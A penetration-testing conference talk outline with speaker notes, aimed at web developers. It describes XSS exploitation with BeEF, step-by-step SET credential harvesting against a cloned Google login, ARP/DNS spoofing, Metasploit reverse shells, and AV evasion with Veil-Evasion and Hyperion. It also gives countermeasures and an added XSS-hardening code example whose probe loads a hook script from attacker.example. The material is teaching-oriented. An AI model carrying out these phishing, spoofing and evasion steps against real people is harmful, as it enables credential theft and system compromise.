0wn1ng The Web at www.wdcnz.com

Abstract:

JavaScript is an incredibly powerful tool for good. With great power comes great responsibility. Are we taking our responsibility seriously? JavaScript is also an incredibly powerful tool for evil. As a developer it's time to empower your tech sense and see how easy it is for those hiding in the shadows to own not only you, but your friends, family, clients, customers... Anyone that uses a browser. New advances in technology look shiny... until we stop believing the hype, open our minds and start poking at them. Let me show you what happens when we start poking.

The Play:

The presentation is basically the process I take to carry out a small client penetration testing assignment, but with a focus on why and how web developers should be doing the same within their teams. It goes through:

1. Why we even care about breaking our own or a client's code and/or system(s)
2. Reconnaissance (information gathering), tools and tips. What can the public actually get their hands on?
3. Vulnerability scanning, tools and tips
4. Vulnerability searching, tools and tips
5. Exploitation, where to start, how to start, tools (and why) and tips
6. Demo 1: Exploiting an XSS-vulnerable web app and what you can get from it using the Browser Exploitation Framework (BeEF). The whole reason for doing this is to be able to show your employer, boss or client why they need to do something about it. After seeing how easy it is and what you can do, few will deny that it simply needs to be fixed, and they will provide the resources for you to do it.
7. Discuss countermeasures
8. Demo 2: Exploiting people with spear phishing, obtaining their credentials by cloning and spoofing a website they frequently log in to, using the Social Engineer Toolkit's (SET) Credential Harvester.
9. Discuss countermeasures
10. Doppelganger domains (domains that look like the real thing but are fakes)
11. Demo 3: Add ARP and DNS spoofing to the mix. Now when a victim browses to a website that they like to spend time at, they will be visiting our spoofed website. In this demo, we add the BeEF hook.js to the cloned website. This hook converts the victim's browser into a zombie that continually polls the BeEF comms server requesting commands to execute on the victim's machine. This is the window of time we use to install a rootkit and pwn the victim's machine.
12. Discuss countermeasures
13. Discuss what BeEF can do
14. Demo 4: Again we clone and host a website we know the victim likes to visit with SET. We use a couple of Metasploit attack methods and exploit memory injection, then select a collection of payloads to deliver via shellcode injection. Encrypt the payloads and configure the reverse shells. Launch Metasploit and watch the reverse shells connect. Attempt to escalate privileges to the system account: anti-virus (AV) stops us.
15. Demo 5: We use Veil-Evasion to get around AV when creating our payload. We encrypt the payload with Hyperion using a weak 128-bit AES key, which it decrypts by brute force at execution time on the victim's machine. We use Metasploit to deliver our psexec exploit carrying the payload created with Veil-Evasion and Hyperion. We watch the attacker's reverse shell connect straight to the system account.
16. Discuss countermeasures
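As an added example (not code from the talk, BeEF or SET), the XSS countermeasure behind Demo 1 and item 7: the vulnerable reflected-output snippet beside its output-encoded form, plus a Content-Security-Policy that makes the browser refuse scripts from any other origin. The host attacker.example in the probe string is a placeholder.

```javascript
// Added example, not from the talk. Two layers of the XSS countermeasure for Demo 1:
// 1) encode untrusted input before it reaches HTML, so an injected script tag is
//    shown as text instead of executed, and 2) a Content-Security-Policy header that
//    only lets the browser run same-origin scripts, so a hook script served from
//    another host is refused even if encoding is missed somewhere. Node.js, no deps.

// Encode the five characters that let untrusted text break out of an HTML context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: a reflected query parameter is concatenated straight into the page.
function renderVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: same page, but the untrusted value is encoded on output.
function renderHardened(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Second layer: the CSP header value to send with every HTML response.
// script-src 'self' blocks scripts from any other origin and all inline scripts.
function cspHeader() {
  return [
    "default-src 'self'",
    "script-src 'self'",
    "object-src 'none'",
    "base-uri 'self'",
    "frame-ancestors 'none'",
  ].join("; ");
}

// Check a developer can run in tests: does the rendered page still carry a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed probe string that tries to load a remote hook script (placeholder host).
const PROBE = '<script src="http://attacker.example/hook.js"></script>';

function demo() {
  const unsafe = renderVulnerable(PROBE);
  const safe = renderHardened(PROBE);
  return { unsafeHasScript: containsScriptTag(unsafe), safeHasScript: containsScriptTag(safe), csp: cspHeader() };
}

console.log(demo()); // unsafeHasScript: true, safeHasScript: false
```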

Speaker Notes:

##############################################################
Why do we Care
##############################################################

As web developers we are hired to create business value and reduce business costs.
Anything you can do to assist in that endeavour will go down well for you.

The following is a set of tools I use often in research and security engagements.

Reconnaissance: The act of information gathering.
The quieter you can do this, the less likely you are to raise suspicions or raise your client's defenses.

Here we want to gather as much information as will potentially be useful for taking into the following stages,
where we start to obtain more information about the services & other software being used & their versions,
moving from passive to more active techniques.

We need to learn as much as possible about the people involved within & related to the target org.
This way we’ll be able to create successful pretexts (become them).

Lee Baird’s discover-scripts
- Shell scripts to aggregate Kali Linux tools & automate various pentesting tasks.
Both passive & active options.
- Allow you to dig up a lot of dirt on your target long before you start trying to penetrate them.
- Domain and Person is very useful.

It’s really important to have done a good job at gathering information in the reconnaissance step.

You’ll know if you didn’t do well, as this step & even more so the exploitation stage will have you wondering what to attack first.
You’ll be hitting machines and people that are less vulnerable than others.
An attacker will focus on the lowest hanging fruit first, so should you.

Open Vulnerability Assessment System (OpenVAS) was forked from Nessus in 2005, before Nessus went proprietary.
It's accompanied by a daily updated feed of Network Vulnerability Tests, over 35,000 in total (as of April 2014).
Scans pretty much everything against known vulns.
Does make a lot of noise though.

Shows a very simple way of obtaining your victim's credentials using the Social Engineer Toolkit.

The Play: ####################################################

Nothing currently in the public web dir
Run setoolkit
Select: 1) Social-Engineering Attacks
Select: 2) Website Attack Vectors
Select: 3) Credential Harvester Attack
Select: 2) Site Cloner
Enter the IP address that SET listens on to capture the key log
We clone accounts.google.com
Host the cloned site and PHP file in the Apache web dir and start Apache if it's not already running
Now we see the cloned artifacts and the key log file
- Currently empty

Victim clicks link that was passed to them via social engineering.
This could be any site that you know the victim has creds for.
- Victim enters:
  - kim@pentester.org
  - myinsecurepassword

As soon as the victim posts:
1. SET uses the HTML referer header, with which it intercepts the request that comes from the victim's IP address and harvests the posted credential fields.
2. The page redirects to the real accounts.google.com

setoolkit provides the ability to craft emails with a spoofed From address. You just need to install and configure sendmail.

BeEF can be installed on public VPSs,
so you can attack a NATed victim's machine from the BeEF web UI from anywhere.

Amazon even has a policy for using their VPSs for penetration testing.

There are a bunch of other public & free VPSs you can use.

There's also a number of ways to automate the running of modules on successful hooking.
BeEF provides the autorun script, allowing a single module to be run,
& there's the beef_injection_framework, which integrates with BeEF and allows many modules to be run against many browsers concurrently.

Discuss WebRTC extension.
- Encourage all to not just take tech at face value, but to think about how it can be exploited.
- This makes us all much better programmers.

Start Veil-Evasion.
List available payloads to encrypt.
Here we choose a service because we are going to use psexec to install it on the victim's box.
We want it to open a reverse shell for us.

Set some options -> generate -> give it a name.
…

We're going to encrypt the payload with Hyperion.
Hyperion encrypts with a weak 128-bit AES key, which it decrypts by brute force at execution time.

Now we're going to run Metasploit with a psexec exploit.
These are the options we use.
We've already got the credentials from a previous exploit…
There are many techniques and tools to help capture these, whether you have physical access or not.
We just need the username & password, or the hash, which is transmitted across the network for all to see.
It is also easily obtainable if you have physical access to the machine.

There are lots of ways of obtaining the target's password hashes, and a few defense techniques.

Obtaining hashes:
- Windows SAM file, located at C:\Windows\System32\config. Only accessible while the system is not running.
- The same values are also stored in the registry at HKEY_LOCAL_MACHINE\SAM. Only accessible while the system is not running.
- Over the wire during authentication.

Defenses:
- Long, complex passwords which are changed regularly.
- Disabling LM hashing (only accepting NTLMv2 auth requests).
- Using the SysKey Windows feature to help strengthen the encryption of the SAM file.
- Evaluate who has physical access.
- Also consider social engineering. People are our strongest & weakest links.